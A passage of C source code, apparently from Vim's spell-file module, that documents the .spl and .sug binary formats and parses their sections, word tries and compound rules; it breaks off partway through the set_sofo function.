* WF_NEEDCOMP >> 8 word only valid in compound
* WF_NOSUGGEST >> 8 word not used for suggestions
* WF_COMPROOT >> 8 word already a compound
* WF_NOCOMPBEF >> 8 no compounding before this word
* WF_NOCOMPAFT >> 8 no compounding after this word
*
* <pflags> 1 byte bitmask of:
* WFP_RARE rare prefix
* WFP_NC non-combining prefix
* WFP_UP letter after prefix made upper case
*
* <region> 1 byte Bitmask for regions in which word is valid. When
* omitted it's valid in all regions.
* Lowest bit is for region 1.
*
* <affixID> 1 byte ID of affix that can be used with this word. In
* PREFIXTREE used for the required prefix ID.
*
* <prefcondnr> 2 bytes Prefix condition number, index in <prefcond> list
* from HEADER.
*
* All text characters are in 'encoding', but stored as single bytes.
*/
/*
* Vim .sug file format: <SUGHEADER>
* <SUGWORDTREE>
* <SUGTABLE>
*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*
* <fileID> 6 bytes "VIMsug"
* <versionnr> 1 byte VIMSUGVERSION
* <timestamp> 8 bytes timestamp that must match with .spl file
*
*
* <SUGWORDTREE>: <wordtree> (see above, no flags or region used)
*
*
* <SUGTABLE>: <sugwcount> <sugline> ...
*
* <sugwcount> 4 bytes number of <sugline> following
*
* <sugline>: <sugnr> ... NUL
*
* <sugnr>: X bytes word number that results in this soundfolded word,
* stored as an offset to the previous number in as
* few bytes as possible, see offset2bytes())
*/
#include "vim.h"
#if defined(FEAT_SPELL) || defined(PROTO)
#ifndef UNIX /* it's in os_unix.h for Unix */
# include <time.h> /* for time_t */
#endif
/* Special byte values for <byte>. Some are only used in the tree for
* postponed prefixes, some only in the other trees. This is a bit messy... */
#define BY_NOFLAGS 0 /* end of word without flags or region; for
* postponed prefix: no <pflags> */
#define BY_INDEX 1 /* child is shared, index follows */
#define BY_FLAGS 2 /* end of word, <flags> byte follows; for
* postponed prefix: <pflags> follows */
#define BY_FLAGS2 3 /* end of word, <flags> and <flags2> bytes
* follow; never used in prefix tree */
#define BY_SPECIAL BY_FLAGS2 /* highest special byte value */
/* Flags used in .spl file for soundsalike flags. */
#define SAL_F0LLOWUP 1
#define SAL_COLLAPSE 2
#define SAL_REM_ACCENTS 4
#define VIMSPELLMAGIC "VIMspell" /* string at start of Vim spell file */
#define VIMSPELLMAGICL 8
#define VIMSPELLVERSION 50
/* Section IDs. Only renumber them when VIMSPELLVERSION changes! */
#define SN_REGION 0 /* <regionname> section */
#define SN_CHARFLAGS 1 /* charflags section */
#define SN_MIDWORD 2 /* <midword> section */
#define SN_PREFCOND 3 /* <prefcond> section */
#define SN_REP 4 /* REP items section */
#define SN_SAL 5 /* SAL items section */
#define SN_SOFO 6 /* soundfolding section */
#define SN_MAP 7 /* MAP items section */
#define SN_COMPOUND 8 /* compound words section */
#define SN_SYLLABLE 9 /* syllable section */
#define SN_NOBREAK 10 /* NOBREAK section */
#define SN_SUGFILE 11 /* timestamp for .sug file */
#define SN_REPSAL 12 /* REPSAL items section */
#define SN_WORDS 13 /* common words */
#define SN_NOSPLITSUGS 14 /* don't split word for suggestions */
#define SN_INFO 15 /* info section */
#define SN_NOCOMPOUNDSUGS 16 /* don't compound for suggestions */
#define SN_END 255 /* end of sections */
#define SNF_REQUIRED 1 /* <sectionflags>: required section */
#define CF_WORD 0x01
#define CF_UPPER 0x02
static int set_spell_finish(spelltab_T *new_st);
static int write_spell_prefcond(FILE *fd, garray_T *gap);
static char_u *read_cnt_string(FILE *fd, int cnt_bytes, int *lenp);
static int read_region_section(FILE *fd, slang_T *slang, int len);
static int read_charflags_section(FILE *fd);
static int read_prefcond_section(FILE *fd, slang_T *lp);
static int read_rep_section(FILE *fd, garray_T *gap, short *first);
static int read_sal_section(FILE *fd, slang_T *slang);
static int read_words_section(FILE *fd, slang_T *lp, int len);
static int read_sofo_section(FILE *fd, slang_T *slang);
static int read_compound(FILE *fd, slang_T *slang, int len);
static int set_sofo(slang_T *lp, char_u *from, char_u *to);
static void set_sal_first(slang_T *lp);
#ifdef FEAT_MBYTE
static int *mb_str2wide(char_u *s);
#endif
static int spell_read_tree(FILE *fd, char_u **bytsp, idx_T **idxsp, int prefixtree, int prefixcnt);
static idx_T read_tree_node(FILE *fd, char_u *byts, idx_T *idxs, int maxidx, idx_T startidx, int prefixtree, int maxprefcondnr);
static void spell_reload_one(char_u *fname, int added_word);
static void set_spell_charflags(char_u *flags, int cnt, char_u *upp);
static int set_spell_chartab(char_u *fol, char_u *low, char_u *upp);
static void set_map_str(slang_T *lp, char_u *map);
static char *e_spell_trunc = N_("E758: Truncated spell file");
static char *e_afftrailing = N_("Trailing text in %s line %d: %s");
static char *e_affname = N_("Affix name too long in %s line %d: %s");
static char *e_affform = N_("E761: Format error in affix file FOL, LOW or UPP");
static char *e_affrange = N_("E762: Character in FOL, LOW or UPP is out of range");
static char *msg_compressing = N_("Compressing word tree...");
/*
* Load one spell file and store the info into a slang_T.
*
* This is invoked in three ways:
* - From spell_load_cb() to load a spell file for the first time. "lang" is
* the language name, "old_lp" is NULL. Will allocate an slang_T.
* - To reload a spell file that was changed. "lang" is NULL and "old_lp"
* points to the existing slang_T.
* - Just after writing a .spl file; it's read back to produce the .sug file.
* "old_lp" is NULL and "lang" is NULL. Will allocate an slang_T.
*
* Returns the slang_T the spell file was loaded into. NULL for error.
*/
slang_T *
spell_load_file(
char_u *fname,
char_u *lang,
slang_T *old_lp,
int silent) /* no error if file doesn't exist */
{
FILE *fd;
char_u buf[VIMSPELLMAGICL];
char_u *p;
int i;
int n;
int len;
char_u *save_sourcing_name = sourcing_name;
linenr_T save_sourcing_lnum = sourcing_lnum;
slang_T *lp = NULL;
int c = 0;
int res;
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
if (!silent)
EMSG2(_(e_notopen), fname);
else if (p_verbose > 2)
{
verbose_enter();
smsg((char_u *)e_notopen, fname);
verbose_leave();
}
goto endFAIL;
}
if (p_verbose > 2)
{
verbose_enter();
smsg((char_u *)_("Reading spell file \"%s\""), fname);
verbose_leave();
}
if (old_lp == NULL)
{
lp = slang_alloc(lang);
if (lp == NULL)
goto endFAIL;
/* Remember the file name, used to reload the file when it's updated. */
lp->sl_fname = vim_strsave(fname);
if (lp->sl_fname == NULL)
goto endFAIL;
/* Check for .add.spl (_add.spl for VMS). */
lp->sl_add = strstr((char *)gettail(fname), SPL_FNAME_ADD) != NULL;
}
else
lp = old_lp;
/* Set sourcing_name, so that error messages mention the file name. */
sourcing_name = fname;
sourcing_lnum = 0;
/*
* <HEADER>: <fileID>
*/
for (i = 0; i < VIMSPELLMAGICL; ++i)
buf[i] = getc(fd); /* <fileID> */
if (STRNCMP(buf, VIMSPELLMAGIC, VIMSPELLMAGICL) != 0)
{
EMSG(_("E757: This does not look like a spell file"));
goto endFAIL;
}
c = getc(fd); /* <versionnr> */
if (c < VIMSPELLVERSION)
{
EMSG(_("E771: Old spell file, needs to be updated"));
goto endFAIL;
}
else if (c > VIMSPELLVERSION)
{
EMSG(_("E772: Spell file is for newer version of Vim"));
goto endFAIL;
}
/*
* <SECTIONS>: <section> ... <sectionend>
* <section>: <sectionID> <sectionflags> <sectionlen> (section contents)
*/
for (;;)
{
n = getc(fd); /* <sectionID> or <sectionend> */
if (n == SN_END)
break;
c = getc(fd); /* <sectionflags> */
len = get4c(fd); /* <sectionlen> */
if (len < 0)
goto truncerr;
res = 0;
switch (n)
{
case SN_INFO:
lp->sl_info = read_string(fd, len); /* <infotext> */
if (lp->sl_info == NULL)
goto endFAIL;
break;
case SN_REGION:
res = read_region_section(fd, lp, len);
break;
case SN_CHARFLAGS:
res = read_charflags_section(fd);
break;
case SN_MIDWORD:
lp->sl_midword = read_string(fd, len); /* <midword> */
if (lp->sl_midword == NULL)
goto endFAIL;
break;
case SN_PREFCOND:
res = read_prefcond_section(fd, lp);
break;
case SN_REP:
res = read_rep_section(fd, &lp->sl_rep, lp->sl_rep_first);
break;
case SN_REPSAL:
res = read_rep_section(fd, &lp->sl_repsal, lp->sl_repsal_first);
break;
case SN_SAL:
res = read_sal_section(fd, lp);
break;
case SN_SOFO:
res = read_sofo_section(fd, lp);
break;
case SN_MAP:
p = read_string(fd, len); /* <mapstr> */
if (p == NULL)
goto endFAIL;
set_map_str(lp, p);
vim_free(p);
break;
case SN_WORDS:
res = read_words_section(fd, lp, len);
break;
case SN_SUGFILE:
lp->sl_sugtime = get8ctime(fd); /* <timestamp> */
break;
case SN_NOSPLITSUGS:
lp->sl_nosplitsugs = TRUE;
break;
case SN_NOCOMPOUNDSUGS:
lp->sl_nocompoundsugs = TRUE;
break;
case SN_COMPOUND:
res = read_compound(fd, lp, len);
break;
case SN_NOBREAK:
lp->sl_nobreak = TRUE;
break;
case SN_SYLLABLE:
lp->sl_syllable = read_string(fd, len); /* <syllable> */
if (lp->sl_syllable == NULL)
goto endFAIL;
if (init_syl_tab(lp) == FAIL)
goto endFAIL;
break;
default:
/* Unsupported section. When it's required give an error
* message. When it's not required skip the contents. */
if (c & SNF_REQUIRED)
{
EMSG(_("E770: Unsupported section in spell file"));
goto endFAIL;
}
while (--len >= 0)
if (getc(fd) < 0)
goto truncerr;
break;
}
someerror:
if (res == SP_FORMERROR)
{
EMSG(_(e_format));
goto endFAIL;
}
if (res == SP_TRUNCERROR)
{
truncerr:
EMSG(_(e_spell_trunc));
goto endFAIL;
}
if (res == SP_OTHERERROR)
goto endFAIL;
}
/* <LWORDTREE> */
res = spell_read_tree(fd, &lp->sl_fbyts, &lp->sl_fidxs, FALSE, 0);
if (res != 0)
goto someerror;
/* <KWORDTREE> */
res = spell_read_tree(fd, &lp->sl_kbyts, &lp->sl_kidxs, FALSE, 0);
if (res != 0)
goto someerror;
/* <PREFIXTREE> */
res = spell_read_tree(fd, &lp->sl_pbyts, &lp->sl_pidxs, TRUE,
lp->sl_prefixcnt);
if (res != 0)
goto someerror;
/* For a new file link it in the list of spell files. */
if (old_lp == NULL && lang != NULL)
{
lp->sl_next = first_lang;
first_lang = lp;
}
goto endOK;
endFAIL:
if (lang != NULL)
/* truncating the name signals the error to spell_load_lang() */
*lang = NUL;
if (lp != NULL && old_lp == NULL)
slang_free(lp);
lp = NULL;
endOK:
if (fd != NULL)
fclose(fd);
sourcing_name = save_sourcing_name;
sourcing_lnum = save_sourcing_lnum;
return lp;
}
/*
* Fill in the wordcount fields for a trie.
 * The total number of words is stored in the index entry of the root node.
*/
static void
tree_count_words(char_u *byts, idx_T *idxs)
{
int depth;
idx_T arridx[MAXWLEN];
int curi[MAXWLEN];
int c;
idx_T n;
int wordcount[MAXWLEN];
arridx[0] = 0;
curi[0] = 1;
wordcount[0] = 0;
depth = 0;
while (depth >= 0 && !got_int)
{
if (curi[depth] > byts[arridx[depth]])
{
/* Done all bytes at this node, go up one level. */
idxs[arridx[depth]] = wordcount[depth];
if (depth > 0)
wordcount[depth - 1] += wordcount[depth];
--depth;
fast_breakcheck();
}
else
{
/* Do one more byte at this node. */
n = arridx[depth] + curi[depth];
++curi[depth];
c = byts[n];
if (c == 0)
{
/* End of word, count it. */
++wordcount[depth];
/* Skip over any other NUL bytes (same word with different
* flags). */
while (byts[n + 1] == 0)
{
++n;
++curi[depth];
}
}
else
{
/* Normal char, go one level deeper to count the words. */
++depth;
arridx[depth] = idxs[n];
curi[depth] = 1;
wordcount[depth] = 0;
}
}
}
}
/*
* Load the .sug files for languages that have one and weren't loaded yet.
*/
void
suggest_load_files(void)
{
langp_T *lp;
int lpi;
slang_T *slang;
char_u *dotp;
FILE *fd;
char_u buf[MAXWLEN];
int i;
time_t timestamp;
int wcount;
int wordnr;
garray_T ga;
int c;
/* Do this for all languages that support sound folding. */
for (lpi = 0; lpi < curwin->w_s->b_langp.ga_len; ++lpi)
{
lp = LANGP_ENTRY(curwin->w_s->b_langp, lpi);
slang = lp->lp_slang;
if (slang->sl_sugtime != 0 && !slang->sl_sugloaded)
{
/* Change ".spl" to ".sug" and open the file. When the file isn't
* found silently skip it. Do set "sl_sugloaded" so that we
* don't try again and again. */
slang->sl_sugloaded = TRUE;
dotp = vim_strrchr(slang->sl_fname, '.');
if (dotp == NULL || fnamecmp(dotp, ".spl") != 0)
continue;
STRCPY(dotp, ".sug");
fd = mch_fopen((char *)slang->sl_fname, "r");
if (fd == NULL)
goto nextone;
/*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*/
for (i = 0; i < VIMSUGMAGICL; ++i)
buf[i] = getc(fd); /* <fileID> */
if (STRNCMP(buf, VIMSUGMAGIC, VIMSUGMAGICL) != 0)
{
EMSG2(_("E778: This does not look like a .sug file: %s"),
slang->sl_fname);
goto nextone;
}
c = getc(fd); /* <versionnr> */
if (c < VIMSUGVERSION)
{
EMSG2(_("E779: Old .sug file, needs to be updated: %s"),
slang->sl_fname);
goto nextone;
}
else if (c > VIMSUGVERSION)
{
EMSG2(_("E780: .sug file is for newer version of Vim: %s"),
slang->sl_fname);
goto nextone;
}
/* Check the timestamp, it must be exactly the same as the one in
* the .spl file. Otherwise the word numbers won't match. */
timestamp = get8ctime(fd); /* <timestamp> */
if (timestamp != slang->sl_sugtime)
{
EMSG2(_("E781: .sug file doesn't match .spl file: %s"),
slang->sl_fname);
goto nextone;
}
/*
* <SUGWORDTREE>: <wordtree>
* Read the trie with the soundfolded words.
*/
if (spell_read_tree(fd, &slang->sl_sbyts, &slang->sl_sidxs,
FALSE, 0) != 0)
{
someerror:
EMSG2(_("E782: error while reading .sug file: %s"),
slang->sl_fname);
slang_clear_sug(slang);
goto nextone;
}
/*
* <SUGTABLE>: <sugwcount> <sugline> ...
*
* Read the table with word numbers. We use a file buffer for
* this, because it's so much like a file with lines. Makes it
* possible to swap the info and save on memory use.
*/
slang->sl_sugbuf = open_spellbuf();
if (slang->sl_sugbuf == NULL)
goto someerror;
/* <sugwcount> */
wcount = get4c(fd);
if (wcount < 0)
goto someerror;
/* Read all the wordnr lists into the buffer, one NUL terminated
* list per line. */
ga_init2(&ga, 1, 100);
for (wordnr = 0; wordnr < wcount; ++wordnr)
{
ga.ga_len = 0;
for (;;)
{
c = getc(fd); /* <sugline> */
if (c < 0 || ga_grow(&ga, 1) == FAIL)
goto someerror;
((char_u *)ga.ga_data)[ga.ga_len++] = c;
if (c == NUL)
break;
}
if (ml_append_buf(slang->sl_sugbuf, (linenr_T)wordnr,
ga.ga_data, ga.ga_len, TRUE) == FAIL)
goto someerror;
}
ga_clear(&ga);
/*
* Need to put word counts in the word tries, so that we can find
* a word by its number.
*/
tree_count_words(slang->sl_fbyts, slang->sl_fidxs);
tree_count_words(slang->sl_sbyts, slang->sl_sidxs);
nextone:
if (fd != NULL)
fclose(fd);
STRCPY(dotp, ".spl");
}
}
}
/*
* Read a length field from "fd" in "cnt_bytes" bytes.
* Allocate memory, read the string into it and add a NUL at the end.
* Returns NULL when the count is zero.
* Sets "*cntp" to SP_*ERROR when there is an error, length of the result
* otherwise.
*/
static char_u *
read_cnt_string(FILE *fd, int cnt_bytes, int *cntp)
{
int cnt = 0;
int i;
char_u *str;
/* read the length bytes, MSB first */
for (i = 0; i < cnt_bytes; ++i)
cnt = (cnt << 8) + getc(fd);
if (cnt < 0)
{
*cntp = SP_TRUNCERROR;
return NULL;
}
*cntp = cnt;
if (cnt == 0)
return NULL; /* nothing to read, return NULL */
str = read_string(fd, cnt);
if (str == NULL)
*cntp = SP_OTHERERROR;
return str;
}
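/*
 * For illustration: with cnt_bytes == 2, the byte sequence 0x00 0x03 'a'
 * 'b' 'c' makes read_cnt_string() return an allocated "abc" and set *cntp
 * to 3; a leading count of zero returns NULL with *cntp == 0.
 */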
/*
* Read SN_REGION: <regionname> ...
* Return SP_*ERROR flags.
*/
static int
read_region_section(FILE *fd, slang_T *lp, int len)
{
int i;
if (len > 16)
return SP_FORMERROR;
for (i = 0; i < len; ++i)
lp->sl_regions[i] = getc(fd); /* <regionname> */
lp->sl_regions[len] = NUL;
return 0;
}
/*
* Read SN_CHARFLAGS section: <charflagslen> <charflags>
* <folcharslen> <folchars>
* Return SP_*ERROR flags.
*/
static int
read_charflags_section(FILE *fd)
{
char_u *flags;
char_u *fol;
int flagslen, follen;
/* <charflagslen> <charflags> */
flags = read_cnt_string(fd, 1, &flagslen);
if (flagslen < 0)
return flagslen;
/* <folcharslen> <folchars> */
fol = read_cnt_string(fd, 2, &follen);
if (follen < 0)
{
vim_free(flags);
return follen;
}
/* Set the word-char flags and fill SPELL_ISUPPER() table. */
if (flags != NULL && fol != NULL)
set_spell_charflags(flags, flagslen, fol);
vim_free(flags);
vim_free(fol);
/* When <charflagslen> is zero then <folcharslen> must also be zero. */
if ((flags == NULL) != (fol == NULL))
return SP_FORMERROR;
return 0;
}
/*
* Read SN_PREFCOND section.
* Return SP_*ERROR flags.
*/
static int
read_prefcond_section(FILE *fd, slang_T *lp)
{
int cnt;
int i;
int n;
char_u *p;
char_u buf[MAXWLEN + 1];
/* <prefcondcnt> <prefcond> ... */
cnt = get2c(fd); /* <prefcondcnt> */
if (cnt <= 0)
return SP_FORMERROR;
lp->sl_prefprog = (regprog_T **)alloc_clear(
(unsigned)sizeof(regprog_T *) * cnt);
if (lp->sl_prefprog == NULL)
return SP_OTHERERROR;
lp->sl_prefixcnt = cnt;
for (i = 0; i < cnt; ++i)
{
/* <prefcond> : <condlen> <condstr> */
n = getc(fd); /* <condlen> */
if (n < 0 || n >= MAXWLEN)
return SP_FORMERROR;
/* When <condlen> is zero we have an empty condition. Otherwise
* compile the regexp program used to check for the condition. */
if (n > 0)
{
buf[0] = '^'; /* always match at one position only */
p = buf + 1;
while (n-- > 0)
*p++ = getc(fd); /* <condstr> */
*p = NUL;
lp->sl_prefprog[i] = vim_regcomp(buf, RE_MAGIC + RE_STRING);
}
}
return 0;
}
/*
* Read REP or REPSAL items section from "fd": <repcount> <rep> ...
* Return SP_*ERROR flags.
*/
static int
read_rep_section(FILE *fd, garray_T *gap, short *first)
{
int cnt;
fromto_T *ftp;
int i;
cnt = get2c(fd); /* <repcount> */
if (cnt < 0)
return SP_TRUNCERROR;
if (ga_grow(gap, cnt) == FAIL)
return SP_OTHERERROR;
/* <rep> : <repfromlen> <repfrom> <reptolen> <repto> */
for (; gap->ga_len < cnt; ++gap->ga_len)
{
ftp = &((fromto_T *)gap->ga_data)[gap->ga_len];
ftp->ft_from = read_cnt_string(fd, 1, &i);
if (i < 0)
return i;
if (i == 0)
return SP_FORMERROR;
ftp->ft_to = read_cnt_string(fd, 1, &i);
if (i <= 0)
{
vim_free(ftp->ft_from);
if (i < 0)
return i;
return SP_FORMERROR;
}
}
/* Fill the first-index table. */
for (i = 0; i < 256; ++i)
first[i] = -1;
for (i = 0; i < gap->ga_len; ++i)
{
ftp = &((fromto_T *)gap->ga_data)[i];
if (first[*ftp->ft_from] == -1)
first[*ftp->ft_from] = i;
}
return 0;
}
/*
* Read SN_SAL section: <salflags> <salcount> <sal> ...
* Return SP_*ERROR flags.
*/
static int
read_sal_section(FILE *fd, slang_T *slang)
{
int i;
int cnt;
garray_T *gap;
salitem_T *smp;
int ccnt;
char_u *p;
int c = NUL;
slang->sl_sofo = FALSE;
i = getc(fd); /* <salflags> */
if (i & SAL_F0LLOWUP)
slang->sl_followup = TRUE;
if (i & SAL_COLLAPSE)
slang->sl_collapse = TRUE;
if (i & SAL_REM_ACCENTS)
slang->sl_rem_accents = TRUE;
cnt = get2c(fd); /* <salcount> */
if (cnt < 0)
return SP_TRUNCERROR;
gap = &slang->sl_sal;
ga_init2(gap, sizeof(salitem_T), 10);
if (ga_grow(gap, cnt + 1) == FAIL)
return SP_OTHERERROR;
/* <sal> : <salfromlen> <salfrom> <saltolen> <salto> */
for (; gap->ga_len < cnt; ++gap->ga_len)
{
smp = &((salitem_T *)gap->ga_data)[gap->ga_len];
ccnt = getc(fd); /* <salfromlen> */
if (ccnt < 0)
return SP_TRUNCERROR;
if ((p = alloc(ccnt + 2)) == NULL)
return SP_OTHERERROR;
smp->sm_lead = p;
/* Read up to the first special char into sm_lead. */
for (i = 0; i < ccnt; ++i)
{
c = getc(fd); /* <salfrom> */
if (vim_strchr((char_u *)"0123456789(-<^$", c) != NULL)
break;
*p++ = c;
}
smp->sm_leadlen = (int)(p - smp->sm_lead);
*p++ = NUL;
/* Put (abc) chars in sm_oneof, if any. */
if (c == '(')
{
smp->sm_oneof = p;
for (++i; i < ccnt; ++i)
{
c = getc(fd); /* <salfrom> */
if (c == ')')
break;
*p++ = c;
}
*p++ = NUL;
if (++i < ccnt)
c = getc(fd);
}
else
smp->sm_oneof = NULL;
/* Any following chars go in sm_rules. */
smp->sm_rules = p;
if (i < ccnt)
/* store the char we got while checking for end of sm_lead */
*p++ = c;
for (++i; i < ccnt; ++i)
*p++ = getc(fd); /* <salfrom> */
*p++ = NUL;
/* <saltolen> <salto> */
smp->sm_to = read_cnt_string(fd, 1, &ccnt);
if (ccnt < 0)
{
vim_free(smp->sm_lead);
return ccnt;
}
#ifdef FEAT_MBYTE
if (has_mbyte)
{
/* convert the multi-byte strings to wide char strings */
smp->sm_lead_w = mb_str2wide(smp->sm_lead);
smp->sm_leadlen = mb_charlen(smp->sm_lead);
if (smp->sm_oneof == NULL)
smp->sm_oneof_w = NULL;
else
smp->sm_oneof_w = mb_str2wide(smp->sm_oneof);
if (smp->sm_to == NULL)
smp->sm_to_w = NULL;
else
smp->sm_to_w = mb_str2wide(smp->sm_to);
if (smp->sm_lead_w == NULL
|| (smp->sm_oneof_w == NULL && smp->sm_oneof != NULL)
|| (smp->sm_to_w == NULL && smp->sm_to != NULL))
{
vim_free(smp->sm_lead);
vim_free(smp->sm_to);
vim_free(smp->sm_lead_w);
vim_free(smp->sm_oneof_w);
vim_free(smp->sm_to_w);
return SP_OTHERERROR;
}
}
#endif
}
if (gap->ga_len > 0)
{
/* Add one extra entry to mark the end with an empty sm_lead. This avoids
* having to check the index every time. */
smp = &((salitem_T *)gap->ga_data)[gap->ga_len];
if ((p = alloc(1)) == NULL)
return SP_OTHERERROR;
p[0] = NUL;
smp->sm_lead = p;
smp->sm_leadlen = 0;
smp->sm_oneof = NULL;
smp->sm_rules = p;
smp->sm_to = NULL;
#ifdef FEAT_MBYTE
if (has_mbyte)
{
smp->sm_lead_w = mb_str2wide(smp->sm_lead);
smp->sm_leadlen = 0;
smp->sm_oneof_w = NULL;
smp->sm_to_w = NULL;
}
#endif
++gap->ga_len;
}
/* Fill the first-index table. */
set_sal_first(slang);
return 0;
}
/*
* Read SN_WORDS: <word> ...
* Return SP_*ERROR flags.
*/
static int
read_words_section(FILE *fd, slang_T *lp, int len)
{
int done = 0;
int i;
int c;
char_u word[MAXWLEN];
while (done < len)
{
/* Read one word at a time. */
for (i = 0; ; ++i)
{
c = getc(fd);
if (c == EOF)
return SP_TRUNCERROR;
word[i] = c;
if (word[i] == NUL)
break;
if (i == MAXWLEN - 1)
return SP_FORMERROR;
}
/* Init the count to 10. */
count_common_word(lp, word, -1, 10);
done += i + 1;
}
return 0;
}
/*
* SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* Return SP_*ERROR flags.
*/
static int
read_sofo_section(FILE *fd, slang_T *slang)
{
int cnt;
char_u *from, *to;
int res;
slang->sl_sofo = TRUE;
/* <sofofromlen> <sofofrom> */
from = read_cnt_string(fd, 2, &cnt);
if (cnt < 0)
return cnt;
/* <sofotolen> <sofoto> */
to = read_cnt_string(fd, 2, &cnt);
if (cnt < 0)
{
vim_free(from);
return cnt;
}
/* Store the info in slang->sl_sal and/or slang->sl_sal_first. */
if (from != NULL && to != NULL)
res = set_sofo(slang, from, to);
else if (from != NULL || to != NULL)
res = SP_FORMERROR; /* only one of two strings is an error */
else
res = 0;
vim_free(from);
vim_free(to);
return res;
}
/*
* Read the compound section from the .spl file:
* <compmax> <compminlen> <compsylmax> <compoptions> <compflags>
* Returns SP_*ERROR flags.
*/
static int
read_compound(FILE *fd, slang_T *slang, int len)
{
int todo = len;
int c;
int atstart;
char_u *pat;
char_u *pp;
char_u *cp;
char_u *ap;
char_u *crp;
int cnt;
garray_T *gap;
if (todo < 2)
return SP_FORMERROR; /* need at least two bytes */
--todo;
c = getc(fd); /* <compmax> */
if (c < 2)
c = MAXWLEN;
slang->sl_compmax = c;
--todo;
c = getc(fd); /* <compminlen> */
if (c < 1)
c = 0;
slang->sl_compminlen = c;
--todo;
c = getc(fd); /* <compsylmax> */
if (c < 1)
c = MAXWLEN;
slang->sl_compsylmax = c;
c = getc(fd); /* <compoptions> */
if (c != 0)
ungetc(c, fd); /* be backwards compatible with Vim 7.0b */
else
{
--todo;
c = getc(fd); /* only use the lower byte for now */
--todo;
slang->sl_compoptions = c;
gap = &slang->sl_comppat;
c = get2c(fd); /* <comppatcount> */
todo -= 2;
ga_init2(gap, sizeof(char_u *), c);
if (ga_grow(gap, c) == OK)
while (--c >= 0)
{
((char_u **)(gap->ga_data))[gap->ga_len++] =
read_cnt_string(fd, 1, &cnt);
/* <comppatlen> <comppattext> */
if (cnt < 0)
return cnt;
todo -= cnt + 1;
}
}
if (todo < 0)
return SP_FORMERROR;
/* Turn the COMPOUNDRULE items into a regexp pattern:
* "a[bc]/a*b+" -> "^\(a[bc]\|a*b\+\)$".
* Inserting backslashes may double the length, "^\(\)$<Nul>" is 7 bytes.
* Conversion to utf-8 may double the size. */
c = todo * 2 + 7;
#ifdef FEAT_MBYTE
if (enc_utf8)
c += todo * 2;
#endif
pat = alloc((unsigned)c);
if (pat == NULL)
return SP_OTHERERROR;
/* We also need a list of all flags that can appear at the start and one
* for all flags. */
cp = alloc(todo + 1);
if (cp == NULL)
{
vim_free(pat);
return SP_OTHERERROR;
}
slang->sl_compstartflags = cp;
*cp = NUL;
ap = alloc(todo + 1);
if (ap == NULL)
{
vim_free(pat);
return SP_OTHERERROR;
}
slang->sl_compallflags = ap;
*ap = NUL;
/* And a list of all patterns in their original form, for checking whether
* compounding may work in match_compoundrule(). This is freed when we
* encounter a wildcard, the check doesn't work then. */
crp = alloc(todo + 1);
slang->sl_comprules = crp;
pp = pat;
*pp++ = '^';
*pp++ = '\\';
*pp++ = '(';
atstart = 1;
while (todo-- > 0)
{
c = getc(fd); /* <compflags> */
if (c == EOF)
{
vim_free(pat);
return SP_TRUNCERROR;
}
/* Add all flags to "sl_compallflags". */
if (vim_strchr((char_u *)"?*+[]/", c) == NULL
&& !byte_in_str(slang->sl_compallflags, c))
{
*ap++ = c;
*ap = NUL;
}
if (atstart != 0)
{
/* At start of item: copy flags to "sl_compstartflags". For a
* [abc] item set "atstart" to 2 and copy up to the ']'. */
if (c == '[')
atstart = 2;
else if (c == ']')
atstart = 0;
else
{
if (!byte_in_str(slang->sl_compstartflags, c))
{
*cp++ = c;
*cp = NUL;
}
if (atstart == 1)
atstart = 0;
}
}
/* Copy flag to "sl_comprules", unless we run into a wildcard. */
if (crp != NULL)
{
if (c == '?' || c == '+' || c == '*')
{
vim_free(slang->sl_comprules);
slang->sl_comprules = NULL;
crp = NULL;
}
else
*crp++ = c;
}
if (c == '/') /* slash separates two items */
{
*pp++ = '\\';
*pp++ = '|';
atstart = 1;
}
else /* normal char, "[abc]" and '*' are copied as-is */
{
if (c == '?' || c == '+' || c == '~')
*pp++ = '\\'; /* "a?" becomes "a\?", "a+" becomes "a\+" */
#ifdef FEAT_MBYTE
if (enc_utf8)
pp += mb_char2bytes(c, pp);
else
#endif
*pp++ = c;
}
}
*pp++ = '\\';
*pp++ = ')';
*pp++ = '$';
*pp = NUL;
if (crp != NULL)
*crp = NUL;
slang->sl_compprog = vim_regcomp(pat, RE_MAGIC + RE_STRING + RE_STRICT);
vim_free(pat);
if (slang->sl_compprog == NULL)
return SP_FORMERROR;
return 0;
}
/*
* Set the SOFOFROM and SOFOTO items in language "lp".
* Returns SP_*ERROR flags when there is something wrong.
*/
static int
set_sofo(slang_T *lp, char_u *from, char_u *to)
{
int i;
#ifdef FEAT_MBYTE
garray_T *gap;
char_u *s;
char_u *p;
int c;
int *inp;
if (has_mbyte)
{
/* Use "sl_sal" as an array with 256 pointers to a list of wide
* characters. The index is the low byte of the character.
* The list contains from-to pairs with a terminating NUL.
* sl_sal_first[] is used for latin1 "from" characters. */
gap = &lp->sl_sal;
ga_init2(gap, sizeof(int *), 1);
if (ga_grow(gap, 256) == FAIL)
return SP_OTHERERROR;
vim_memset(gap->ga_data, 0, sizeof(int *) * 256);
gap->ga_len = 256;
/* First count the number of items for each list. Temporarily use
* sl_sal_first[] for this. */
for (p = from, s = to; *p != NUL && *s != NUL; )
{
c = mb_cptr2char_adv(&p);
mb_cptr_adv(s);
if (c >= 256)
++lp->sl_sal_first[c & 0xff];
}
if (*p != NUL || *s != NUL) /* lengths differ */
return SP_FORMERROR;
/* Allocate the lists. */
for (i = 0; i < 256; ++i)
if (lp->sl_sal_first[i] > 0)
{
p = alloc(sizeof(int) * (lp->sl_sal_first[i] * 2 + 1));
if (p == NULL)
return SP_OTHERERROR;
((int **)gap->ga_data)[i] = (int *)p;
*(int *)p = 0;
}
/* Put the characters up to 255 in sl_sal_first[] the rest in a sl_sal
* list. */
vim_memset(lp->sl_sal_first, 0, sizeof(salfirst_T) * 256);
for (p = from, s = to; *p != NUL && *s != NUL; )
{
c = mb_cptr2char_adv(&p);
i = mb_cptr2char_adv(&s);
if (c >= 256)
{
/* Append the from-to chars at the end of the list with
* the low byte. */
inp = ((int **)gap->ga_data)[c & 0xff];
while (*inp != 0)
++inp;
*inp++ = c; /* from char */
*inp++ = i; /* to char */
*inp++ = NUL; /* NUL at the end */
}
else
/* mapping byte to char is done in sl_sal_first[] */
lp->sl_sal_first[c] = i;
}
}
else
#endif
{
/* mapping bytes to bytes is done in sl_sal_first[] */
if (STRLEN(from) != STRLEN(to))
return SP_FORMERROR;
